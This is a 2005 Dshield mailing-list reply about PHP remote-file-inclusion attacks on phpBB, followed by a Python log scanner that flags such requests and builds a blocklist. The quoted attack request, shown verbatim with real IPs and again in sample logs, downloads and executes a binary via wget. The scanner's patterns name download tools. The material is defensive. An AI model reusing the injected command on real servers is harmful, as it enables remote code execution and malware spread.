[Dshield] PHP attacks (was Re: Destructive botnet originating from Japan)

Frank Knobbe frank at knobbe.us
Sun Dec 25 00:07:55 GMT 2005


On Sat, 2005-12-24 at 16:31 -0500, Jeff Kell wrote:
> Just spotted this on one of my sensors (obfuscated http: but otherwise 
> verbatim):
> 
> >GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=h t t p://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1


Jeff,

I don't think that's related to the DoS attack. There is some nastyware
out there trying to spread this way. We've observed this sort of stuff
since the beginning of December, with the IP addresses being those of zombies
spreading the nastyware. Hop on over to the #shadowserver-mw channel.
The ShadowServer crew has an interesting project that automatically
inventories and catalogs the malware that's spreading from there. The
URL hits are identical (i.e. cmd.gif).

I wrote a quick hack the other day to import these types of events and
have Snortsam block these hosts automatically. Let me know if you want a
copy of that particular feed.

Merry Christmas!
Frank
(close to releasing a Christmas version of Snortsam)

-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.
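The request Jeff quoted is a PHP remote file inclusion attempt: the `phpbb_root_path` parameter is pointed at a remote URL, and the `cmd` parameter carries a shell pipeline that fetches and runs a binary. Frank's Snortsam import hack is not on the page, so the following is an added example (not his code and not Snortsam's) showing how such events can be picked out of ordinary web-server logs and turned into a list of hosts to hand to a blocker. It assumes Common Log Format lines; the log lines, IP addresses (RFC 5737 documentation ranges) and hostnames in it are constructed, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in Common Log Format, modelled on the request
# quoted in the post.  Addresses are documentation ranges; this is not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Dec/2005:16:31:02 -0500] "GET /modules/Forums/admin/'
    'admin_styles.php?phpbb_root_path=http://198.51.100.7/cmd.gif?&cmd=cd%20/tmp;'
    'wget%20192.0.2.9/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 200 512',
    '203.0.113.6 - - [24/Dec/2005:16:32:10 -0500] "GET /modules/Forums/viewtopic.php?t=42 HTTP/1.1" 200 8192',
    # A remote URL in a parameter is not proof of RFI by itself (e.g. a redirect target).
    '203.0.113.7 - - [24/Dec/2005:16:33:41 -0500] "GET /redirect.php?url=http://www.example.com/ HTTP/1.1" 302 0',
]

# client, method, request target
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) HTTP/[\d.]+"')
# a parameter value that is itself a remote URL (the RFI indicator)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://([^/:?#]+)', re.I)
# download/exec tooling typically seen in the injected command
CMD_TOKEN_RE = re.compile(r'\b(wget|curl|fetch|lwp-download|chmod)\b')
# host the injected command downloads its payload from
FETCH_HOST_RE = re.compile(r'\b(?:wget|curl|fetch|lwp-download)\s+(?:https?://|ftp://)?([\w.-]+)')


def parse_request(line):
    """Return (client_ip, path, [(name, decoded_value), ...]) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, target = m.groups()
    path, _, query = target.partition('?')
    params = []
    # Split on '&' only: ';' is part of the injected command, not a separator.
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        params.append((name, unquote(value)))
    return client, path, params


def analyze(line):
    """Return a finding dict for an RFI / command-injection attempt, else None."""
    parsed = parse_request(line)
    if parsed is None:
        return None
    client, path, params = parsed
    rfi_params, payload_hosts, tokens = [], set(), set()
    for name, value in params:
        url = REMOTE_URL_RE.match(value)
        if url:
            rfi_params.append(name)
            payload_hosts.add(url.group(1))
        tokens.update(CMD_TOKEN_RE.findall(value))
        payload_hosts.update(FETCH_HOST_RE.findall(value))
    if not rfi_params and not tokens:
        return None
    # Remote URL plus download/exec tooling in the same request is the strong signal.
    severity = 'high' if rfi_params and tokens else 'medium'
    return {
        'client': client,
        'path': path,
        'rfi_params': rfi_params,
        'command_tokens': sorted(tokens),
        'payload_hosts': sorted(payload_hosts),
        'severity': severity,
    }


def scan(lines):
    """Run analyze() over a log and keep the findings."""
    return [f for f in (analyze(l) for l in lines) if f is not None]


def blocklist(findings, min_severity='high'):
    """Hosts worth feeding to a blocker: the requesting zombie plus the payload hosts.
    Only high-severity findings are used by default so a plain redirect URL is not blocked."""
    hosts = set()
    for f in findings:
        if min_severity == 'high' and f['severity'] != 'high':
            continue
        hosts.add(f['client'])
        hosts.update(f['payload_hosts'])
    return sorted(hosts)


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print('block:', blocklist(scan(SAMPLE_LOG)))
```

The point of the severity split is the third sample line: a URL in a parameter alone produces a medium finding to review, while only requests that also carry download-and-execute tooling feed the automatic blocklist. Pushing that list into Snortsam or a firewall is left to whatever interface the blocker offers.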
